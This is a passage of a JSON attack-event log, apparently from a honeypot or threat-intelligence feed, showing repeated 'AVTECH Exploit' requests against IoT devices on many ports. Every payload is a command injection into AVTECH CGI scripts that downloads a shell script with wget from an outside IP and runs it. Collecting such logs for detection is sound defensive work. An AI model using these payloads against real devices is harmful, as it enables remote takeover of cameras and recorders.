4123.       "first_seen": "2020-06-01T05:02:18Z",
4124.       "last_seen": "2020-06-01T05:16:52Z"
4125.     },
4126.     {
4127.       "event_id": "4c11245ab6b148eca33d9f23fa8cd861e83317edbf0abedcf9327a0fd1876e3c",
4128.       "source_ip_address": "193.142.146.34",
4129.       "country": "NL",
4130.       "user_agent": "Snickers-Avtech",
4131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4132.       "post_data": "",
4133.       "target_port": 2480,
4134.       "protocol": "tcp",
4135.       "tags": [
4136.         {
4137.           "cve": "",
4138.           "category": "IoT",
4139.           "description": "AVTECH Exploit"
4140.         }
4141.       ],
4142.       "event_count": 2,
4143.       "first_seen": "2020-06-01T05:04:01Z",
4144.       "last_seen": "2020-06-01T05:16:46Z"
4145.     },
4146.     {
4147.       "event_id": "57aaa55a8a31c6225d8261b7bcf67324250033c9d0ed36491e8b184a1c1f9c33",
4148.       "source_ip_address": "193.142.146.34",
4149.       "country": "NL",
4150.       "user_agent": "Snickers-Avtech",
4151.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4152.       "post_data": "",
4153.       "target_port": 8080,
4154.       "protocol": "tcp",
4155.       "tags": [
4156.         {
4157.           "cve": "",
4158.           "category": "IoT",
4159.           "description": "AVTECH Exploit"
4160.         }
4161.       ],
4162.       "event_count": 5,
4163.       "first_seen": "2020-06-01T05:05:23Z",
4164.       "last_seen": "2020-06-01T05:16:43Z"
4165.     },
4166.     {
4167.       "event_id": "f61cd269262fb33c1397dd125e1c66aa455c86d2c3037855531eba2e555f2897",
4168.       "source_ip_address": "193.142.146.34",
4169.       "country": "NL",
4170.       "user_agent": "Snickers-Avtech",
4171.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4172.       "post_data": "",
4173.       "target_port": 8089,
4174.       "protocol": "tcp",
4175.       "tags": [
4176.         {
4177.           "cve": "",
4178.           "category": "IoT",
4179.           "description": "AVTECH Exploit"
4180.         }
4181.       ],
4182.       "event_count": 4,
4183.       "first_seen": "2020-06-01T05:02:10Z",
4184.       "last_seen": "2020-06-01T05:16:43Z"
4185.     },
4186.     {
4187.       "event_id": "a5658aa44ca3560ee6796c433c96efb2c862b3b6c53836be11150c2c89a9ca0c",
4188.       "source_ip_address": "193.142.146.34",
4189.       "country": "NL",
4190.       "user_agent": "Snickers-Avtech",
4191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4192.       "post_data": "",
4193.       "target_port": 2480,
4194.       "protocol": "tcp",
4195.       "tags": [
4196.         {
4197.           "cve": "",
4198.           "category": "IoT",
4199.           "description": "AVTECH Exploit"
4200.         }
4201.       ],
4202.       "event_count": 2,
4203.       "first_seen": "2020-06-01T05:03:54Z",
4204.       "last_seen": "2020-06-01T05:16:38Z"
4205.     },
4206.     {
4207.       "event_id": "8c89e454daa5ae81cde53dc96551e3f8e527d9e7975707c0945cdc9dfc144e4d",
4208.       "source_ip_address": "193.142.146.34",
4209.       "country": "NL",
4210.       "user_agent": "Snickers-Avtech",
4211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4212.       "post_data": "",
4213.       "target_port": 8080,
4214.       "protocol": "tcp",
4215.       "tags": [
4216.         {
4217.           "cve": "",
4218.           "category": "IoT",
4219.           "description": "AVTECH Exploit"
4220.         }
4221.       ],
4222.       "event_count": 5,
4223.       "first_seen": "2020-06-01T05:05:16Z",
4224.       "last_seen": "2020-06-01T05:16:37Z"
4225.     },
4226.     {
4227.       "event_id": "a4968ca8686a1aa6203c8cd9bccdce7c9b02b25293c5d0b0243da547e6d9a0ab",
4228.       "source_ip_address": "193.142.146.34",
4229.       "country": "NL",
4230.       "user_agent": "Snickers-Avtech",
4231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4232.       "post_data": "",
4233.       "target_port": 50000,
4234.       "protocol": "tcp",
4235.       "tags": [
4236.         {
4237.           "cve": "",
4238.           "category": "IoT",
4239.           "description": "AVTECH Exploit"
4240.         }
4241.       ],
4242.       "event_count": 2,
4243.       "first_seen": "2020-06-01T05:16:10Z",
4244.       "last_seen": "2020-06-01T05:16:11Z"
4245.     },
4246.     {
4247.       "event_id": "54f593bf6608e2c4b52008cba5446d6d0681ab0c18b0a7de1434b8ecdede49cc",
4248.       "source_ip_address": "193.142.146.34",
4249.       "country": "NL",
4250.       "user_agent": "Snickers-Avtech",
4251.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4252.       "post_data": "",
4253.       "target_port": 50000,
4254.       "protocol": "tcp",
4255.       "tags": [
4256.         {
4257.           "cve": "",
4258.           "category": "IoT",
4259.           "description": "AVTECH Exploit"
4260.         }
4261.       ],
4262.       "event_count": 2,
4263.       "first_seen": "2020-06-01T05:16:04Z",
4264.       "last_seen": "2020-06-01T05:16:05Z"
4265.     },
4266.     {
4267.       "event_id": "892549dd6ba6571f43491b7e551dd48b3be343de3640e338bd3944bd658c3dd4",
4268.       "source_ip_address": "193.142.146.34",
4269.       "country": "NL",
4270.       "user_agent": "Snickers-Avtech",
4271.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4272.       "post_data": "",
4273.       "target_port": 9001,
4274.       "protocol": "tcp",
4275.       "tags": [
4276.         {
4277.           "cve": "",
4278.           "category": "IoT",
4279.           "description": "AVTECH Exploit"
4280.         }
4281.       ],
4282.       "event_count": 2,
4283.       "first_seen": "2020-06-01T05:05:37Z",
4284.       "last_seen": "2020-06-01T05:15:59Z"
4285.     },
4286.     {
4287.       "event_id": "29453013052bca25a8aefa9df5a94e9b259eb5b310e95683c400e7e69e4b4dc4",
4288.       "source_ip_address": "193.142.146.34",
4289.       "country": "NL",
4290.       "user_agent": "Snickers-Avtech",
4291.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4292.       "post_data": "",
4293.       "target_port": 8090,
4294.       "protocol": "tcp",
4295.       "tags": [
4296.         {
4297.           "cve": "",
4298.           "category": "IoT",
4299.           "description": "AVTECH Exploit"
4300.         }
4301.       ],
4302.       "event_count": 5,
4303.       "first_seen": "2020-06-01T05:04:21Z",
4304.       "last_seen": "2020-06-01T05:15:28Z"
4305.     },
4306.     {
4307.       "event_id": "76008ce60ceea41dbd8d7c93a09078172ad44f406af78b88c09819bbb3735805",
4308.       "source_ip_address": "193.142.146.34",
4309.       "country": "NL",
4310.       "user_agent": "Snickers-Avtech",
4311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4312.       "post_data": "",
4313.       "target_port": 8090,
4314.       "protocol": "tcp",
4315.       "tags": [
4316.         {
4317.           "cve": "",
4318.           "category": "IoT",
4319.           "description": "AVTECH Exploit"
4320.         }
4321.       ],
4322.       "event_count": 5,
4323.       "first_seen": "2020-06-01T05:04:13Z",
4324.       "last_seen": "2020-06-01T05:15:21Z"
4325.     },
4326.     {
4327.       "event_id": "adbb56381605181a192a96c12c350e0b351985b33574bbf8fbc86dca6d535440",
4328.       "source_ip_address": "193.142.146.34",
4329.       "country": "NL",
4330.       "user_agent": "Snickers-Avtech",
4331.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4332.       "post_data": "",
4333.       "target_port": 2375,
4334.       "protocol": "tcp",
4335.       "tags": [
4336.         {
4337.           "cve": "",
4338.           "category": "IoT",
4339.           "description": "AVTECH Exploit"
4340.         }
4341.       ],
4342.       "event_count": 5,
4343.       "first_seen": "2020-06-01T05:08:01Z",
4344.       "last_seen": "2020-06-01T05:14:47Z"
4345.     },
4346.     {
4347.       "event_id": "ab5d616b74a075c5babc523d57f9736eb78f915981b1cbcae8453bc8b0e215f4",
4348.       "source_ip_address": "193.142.146.34",
4349.       "country": "NL",
4350.       "user_agent": "Snickers-Avtech",
4351.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4352.       "post_data": "",
4353.       "target_port": 2375,
4354.       "protocol": "tcp",
4355.       "tags": [
4356.         {
4357.           "cve": "",
4358.           "category": "IoT",
4359.           "description": "AVTECH Exploit"
4360.         }
4361.       ],
4362.       "event_count": 5,
4363.       "first_seen": "2020-06-01T05:07:55Z",
4364.       "last_seen": "2020-06-01T05:14:38Z"
4365.     },
4366.     {
4367.       "event_id": "d2cd6c7792ac31ea59c66513d2cd1d91210fb47ee770754dea8fd1e75c44079f",
4368.       "source_ip_address": "193.142.146.34",
4369.       "country": "NL",
4370.       "user_agent": "Snickers-Avtech",
4371.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4372.       "post_data": "",
4373.       "target_port": 8291,
4374.       "protocol": "tcp",
4375.       "tags": [
4376.         {
4377.           "cve": "",
4378.           "category": "IoT",
4379.           "description": "AVTECH Exploit"
4380.         }
4381.       ],
4382.       "event_count": 2,
4383.       "first_seen": "2020-06-01T05:00:39Z",
4384.       "last_seen": "2020-06-01T05:14:17Z"
4385.     },
4386.     {
4387.       "event_id": "cf2f8f24877ca204dd90e4db808b60b76a73c25586fb152aa8ef927c6366fc0f",
4388.       "source_ip_address": "193.142.146.34",
4389.       "country": "NL",
4390.       "user_agent": "Snickers-Avtech",
4391.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4392.       "post_data": "",
4393.       "target_port": 8291,
4394.       "protocol": "tcp",
4395.       "tags": [
4396.         {
4397.           "cve": "",
4398.           "category": "IoT",
4399.           "description": "AVTECH Exploit"
4400.         }
4401.       ],
4402.       "event_count": 2,
4403.       "first_seen": "2020-06-01T05:00:32Z",
4404.       "last_seen": "2020-06-01T05:14:09Z"
4405.     },
4406.     {
4407.       "event_id": "7733f8025a2cbf0f612c403994ce8a471e14e0b0b3fef47575c8b76f44d799e4",
4408.       "source_ip_address": "193.142.146.34",
4409.       "country": "NL",
4410.       "user_agent": "Snickers-Avtech",
4411.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4412.       "post_data": "",
4413.       "target_port": 8123,
4414.       "protocol": "tcp",
4415.       "tags": [
4416.         {
4417.           "cve": "",
4418.           "category": "IoT",
4419.           "description": "AVTECH Exploit"
4420.         }
4421.       ],
4422.       "event_count": 4,
4423.       "first_seen": "2020-06-01T05:01:50Z",
4424.       "last_seen": "2020-06-01T05:12:55Z"
4425.     },
4426.     {
4427.       "event_id": "587d4176ed7ec18faf6a4e73adc1b1d0826554c85b8feb9f54d2423057feb87c",
4428.       "source_ip_address": "193.142.146.34",
4429.       "country": "NL",
4430.       "user_agent": "Snickers-Avtech",
4431.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4432.       "post_data": "",
4433.       "target_port": 8123,
4434.       "protocol": "tcp",
4435.       "tags": [
4436.         {
4437.           "cve": "",
4438.           "category": "IoT",
4439.           "description": "AVTECH Exploit"
4440.         }
4441.       ],
4442.       "event_count": 4,
4443.       "first_seen": "2020-06-01T05:01:42Z",
4444.       "last_seen": "2020-06-01T05:12:46Z"
4445.     },
4446.     {
4447.       "event_id": "e2bb9b03a7742d1e5320533889ce84851bd470960e9d2efba7b41e9051e0d5d7",
4448.       "source_ip_address": "193.142.146.34",
4449.       "country": "NL",
4450.       "user_agent": "Snickers-Avtech",
4451.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4452.       "post_data": "",
4453.       "target_port": 9595,
4454.       "protocol": "tcp",
4455.       "tags": [
4456.         {
4457.           "cve": "",
4458.           "category": "IoT",
4459.           "description": "AVTECH Exploit"
4460.         }
4461.       ],
4462.       "event_count": 3,
4463.       "first_seen": "2020-06-01T05:05:11Z",
4464.       "last_seen": "2020-06-01T05:12:40Z"
4465.     },
4466.     {
4467.       "event_id": "64a137d573e693063cb96fd1d70cf4a4441f6ed37c2a1108e3007e238881f69b",
4468.       "source_ip_address": "193.142.146.34",
4469.       "country": "NL",
4470.       "user_agent": "Snickers-Avtech",
4471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4472.       "post_data": "",
4473.       "target_port": 9595,
4474.       "protocol": "tcp",
4475.       "tags": [
4476.         {
4477.           "cve": "",
4478.           "category": "IoT",
4479.           "description": "AVTECH Exploit"
4480.         }
4481.       ],
4482.       "event_count": 3,
4483.       "first_seen": "2020-06-01T05:05:03Z",
4484.       "last_seen": "2020-06-01T05:12:32Z"
4485.     },
4486.     {
4487.       "event_id": "ceef99a2f167f9774935f6f0293cb07de7e2ba12d1656774859a3a1723649bf9",
4488.       "source_ip_address": "193.142.146.34",
4489.       "country": "NL",
4490.       "user_agent": "Snickers-Avtech",
4491.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4492.       "post_data": "",
4493.       "target_port": 5280,
4494.       "protocol": "tcp",
4495.       "tags": [
4496.         {
4497.           "cve": "",
4498.           "category": "IoT",
4499.           "description": "AVTECH Exploit"
4500.         }
4501.       ],
4502.       "event_count": 1,
4503.       "first_seen": "2020-06-01T05:10:41Z",
4504.       "last_seen": "2020-06-01T05:10:41Z"
4505.     },
4506.     {
4507.       "event_id": "cf3ec70fa68e4c9d946c076436f8ce457ff586d72c5997866a72441c1bf07347",
4508.       "source_ip_address": "193.142.146.34",
4509.       "country": "NL",
4510.       "user_agent": "Snickers-Avtech",
4511.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4512.       "post_data": "",
4513.       "target_port": 5280,
4514.       "protocol": "tcp",
4515.       "tags": [
4516.         {
4517.           "cve": "",
4518.           "category": "IoT",
4519.           "description": "AVTECH Exploit"
4520.         }
4521.       ],
4522.       "event_count": 1,
4523.       "first_seen": "2020-06-01T05:10:33Z",
4524.       "last_seen": "2020-06-01T05:10:33Z"
4525.     },
4526.     {
4527.       "event_id": "84d6015edd3b5339f7c3ac8fc312a496afb23ee0c9c7b7ba03449ec093386d0c",
4528.       "source_ip_address": "193.142.146.34",
4529.       "country": "NL",
4530.       "user_agent": "Snickers-Avtech",
4531.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4532.       "post_data": "",
4533.       "target_port": 3791,
4534.       "protocol": "tcp",
4535.       "tags": [
4536.         {
4537.           "cve": "",
4538.           "category": "IoT",
4539.           "description": "AVTECH Exploit"
4540.         }
4541.       ],
4542.       "event_count": 1,
4543.       "first_seen": "2020-06-01T05:10:32Z",
4544.       "last_seen": "2020-06-01T05:10:32Z"
4545.     },
4546.     {
4547.       "event_id": "80da55f6c6b7294f086385b57d6d065f54b4d6faee2bf590d5e7ab0841952a09",
4548.       "source_ip_address": "193.142.146.34",
4549.       "country": "NL",
4550.       "user_agent": "Snickers-Avtech",
4551.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4552.       "post_data": "",
4553.       "target_port": 3791,
4554.       "protocol": "tcp",
4555.       "tags": [
4556.         {
4557.           "cve": "",
4558.           "category": "IoT",
4559.           "description": "AVTECH Exploit"
4560.         }
4561.       ],
4562.       "event_count": 1,
4563.       "first_seen": "2020-06-01T05:10:22Z",
4564.       "last_seen": "2020-06-01T05:10:22Z"
4565.     },
4566.     {
4567.       "event_id": "1f050a6cf85b5a56edf2079c9f8f68cb429a64376c18b6b16d1ce978cae239d0",
4568.       "source_ip_address": "193.142.146.34",
4569.       "country": "NL",
4570.       "user_agent": "Snickers-Avtech",
4571.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4572.       "post_data": "",
4573.       "target_port": 7001,
4574.       "protocol": "tcp",
4575.       "tags": [
4576.         {
4577.           "cve": "",
4578.           "category": "IoT",
4579.           "description": "AVTECH Exploit"
4580.         }
4581.       ],
4582.       "event_count": 3,
4583.       "first_seen": "2020-06-01T05:01:01Z",
4584.       "last_seen": "2020-06-01T05:09:04Z"
4585.     },
4586.     {
4587.       "event_id": "ced075a28f055b865478976667c0caaaecb5c017b67d00777ed6239bff897ff6",
4588.       "source_ip_address": "193.142.146.34",
4589.       "country": "NL",
4590.       "user_agent": "Snickers-Avtech",
4591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4592.       "post_data": "",
4593.       "target_port": 7001,
4594.       "protocol": "tcp",
4595.       "tags": [
4596.         {
4597.           "cve": "",
4598.           "category": "IoT",
4599.           "description": "AVTECH Exploit"
4600.         }
4601.       ],
4602.       "event_count": 3,
4603.       "first_seen": "2020-06-01T05:00:53Z",
4604.       "last_seen": "2020-06-01T05:08:57Z"
4605.     },
4606.     {
4607.       "event_id": "fb331b68c3a65259bf7ed61c513a30da8a88c5d44ccdb9aa3c131ac4318bdb21",
4608.       "source_ip_address": "193.142.146.34",
4609.       "country": "NL",
4610.       "user_agent": "Snickers-Avtech",
4611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4612.       "post_data": "",
4613.       "target_port": 9100,
4614.       "protocol": "tcp",
4615.       "tags": [
4616.         {
4617.           "cve": "",
4618.           "category": "IoT",
4619.           "description": "AVTECH Exploit"
4620.         }
4621.       ],
4622.       "event_count": 1,
4623.       "first_seen": "2020-06-01T05:07:16Z",
4624.       "last_seen": "2020-06-01T05:07:16Z"
4625.     },
4626.     {
4627.       "event_id": "0ea03670ac838ba7a865c2927c678007d5208724ba24e6cbaf7e95db20ab0b48",
4628.       "source_ip_address": "193.142.146.34",
4629.       "country": "NL",
4630.       "user_agent": "Snickers-Avtech",
4631.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4632.       "post_data": "",
4633.       "target_port": 9100,
4634.       "protocol": "tcp",
4635.       "tags": [
4636.         {
4637.           "cve": "",
4638.           "category": "IoT",
4639.           "description": "AVTECH Exploit"
4640.         }
4641.       ],
4642.       "event_count": 1,
4643.       "first_seen": "2020-06-01T05:07:08Z",
4644.       "last_seen": "2020-06-01T05:07:08Z"
4645.     },
4646.     {
4647.       "event_id": "cb9cb381e312f842a09f1d5a9a84e4646e1345b26a6344d0f7442e7ff51d1ffa",
4648.       "source_ip_address": "193.142.146.34",
4649.       "country": "NL",
4650.       "user_agent": "Snickers-Avtech",
4651.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4652.       "post_data": "",
4653.       "target_port": 4242,
4654.       "protocol": "tcp",
4655.       "tags": [
4656.         {
4657.           "cve": "",
4658.           "category": "IoT",
4659.           "description": "AVTECH Exploit"
4660.         }
4661.       ],
4662.       "event_count": 2,
4663.       "first_seen": "2020-06-01T05:03:59Z",
4664.       "last_seen": "2020-06-01T05:06:55Z"
4665.     },
4666.     {
4667.       "event_id": "18af7446bfbaa13fc5a3ee3ed51b2f0b0f9839e78b700d15d6b6e72b25f03e62",
4668.       "source_ip_address": "193.142.146.34",
4669.       "country": "NL",
4670.       "user_agent": "Snickers-Avtech",
4671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4672.       "post_data": "",
4673.       "target_port": 4242,
4674.       "protocol": "tcp",
4675.       "tags": [
4676.         {
4677.           "cve": "",
4678.           "category": "IoT",
4679.           "description": "AVTECH Exploit"
4680.         }
4681.       ],
4682.       "event_count": 2,
4683.       "first_seen": "2020-06-01T05:03:52Z",
4684.       "last_seen": "2020-06-01T05:06:48Z"
4685.     },
4686.     {
4687.       "event_id": "f8285fcc3f01134ce0bb1b4482875dca647e11d018e9983a87e8009df71f0c9f",
4688.       "source_ip_address": "193.142.146.34",
4689.       "country": "NL",
4690.       "user_agent": "Snickers-Avtech",
4691.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4692.       "post_data": "",
4693.       "target_port": 10443,
4694.       "protocol": "tcp",
4695.       "tags": [
4696.         {
4697.           "cve": "",
4698.           "category": "IoT",
4699.           "description": "AVTECH Exploit"
4700.         }
4701.       ],
4702.       "event_count": 1,
4703.       "first_seen": "2020-06-01T05:06:47Z",
4704.       "last_seen": "2020-06-01T05:06:47Z"
4705.     },
4706.     {
4707.       "event_id": "d5a7a16a1d90182ca8dce5744a9fcec6fb5bfce264311f35d92323effead58c6",
4708.       "source_ip_address": "193.142.146.34",
4709.       "country": "NL",
4710.       "user_agent": "Snickers-Avtech",
4711.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4712.       "post_data": "",
4713.       "target_port": 10443,
4714.       "protocol": "tcp",
4715.       "tags": [
4716.         {
4717.           "cve": "",
4718.           "category": "IoT",
4719.           "description": "AVTECH Exploit"
4720.         }
4721.       ],
4722.       "event_count": 1,
4723.       "first_seen": "2020-06-01T05:06:39Z",
4724.       "last_seen": "2020-06-01T05:06:39Z"
4725.     },
4726.     {
4727.       "event_id": "26ef2df73d13017fdc9b06f2067687f6a668b8b9b2bbda38ab631cb89e3b3f11",
4728.       "source_ip_address": "193.142.146.34",
4729.       "country": "NL",
4730.       "user_agent": "Snickers-Avtech",
4731.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4732.       "post_data": "",
4733.       "target_port": 7474,
4734.       "protocol": "tcp",
4735.       "tags": [
4736.         {
4737.           "cve": "",
4738.           "category": "IoT",
4739.           "description": "AVTECH Exploit"
4740.         }
4741.       ],
4742.       "event_count": 2,
4743.       "first_seen": "2020-06-01T05:02:56Z",
4744.       "last_seen": "2020-06-01T05:06:35Z"
4745.     },
4746.     {
4747.       "event_id": "6b94a1154e0c4331052239163aad75328bf038cdef01bbeedb1d79a93d338d57",
4748.       "source_ip_address": "193.142.146.34",
4749.       "country": "NL",
4750.       "user_agent": "Snickers-Avtech",
4751.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4752.       "post_data": "",
4753.       "target_port": 7474,
4754.       "protocol": "tcp",
4755.       "tags": [
4756.         {
4757.           "cve": "",
4758.           "category": "IoT",
4759.           "description": "AVTECH Exploit"
4760.         }
4761.       ],
4762.       "event_count": 2,
4763.       "first_seen": "2020-06-01T05:02:47Z",
4764.       "last_seen": "2020-06-01T05:06:28Z"
4765.     },
4766.     {
4767.       "event_id": "615dcb886c99158a26133e93204173715ea08978f0e1d8fb307722d95375603e",
4768.       "source_ip_address": "193.142.146.34",
4769.       "country": "NL",
4770.       "user_agent": "Snickers-Avtech",
4771.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4772.       "post_data": "",
4773.       "target_port": 6511,
4774.       "protocol": "tcp",
4775.       "tags": [
4776.         {
4777.           "cve": "",
4778.           "category": "IoT",
4779.           "description": "AVTECH Exploit"
4780.         }
4781.       ],
4782.       "event_count": 2,
4783.       "first_seen": "2020-06-01T05:02:56Z",
4784.       "last_seen": "2020-06-01T05:03:53Z"
4785.     },
4786.     {
4787.       "event_id": "f6496744695ad827d59b1c2c419f7c028ee5cee13c94a2cd2c6e46865c05dbd7",
4788.       "source_ip_address": "193.142.146.34",
4789.       "country": "NL",
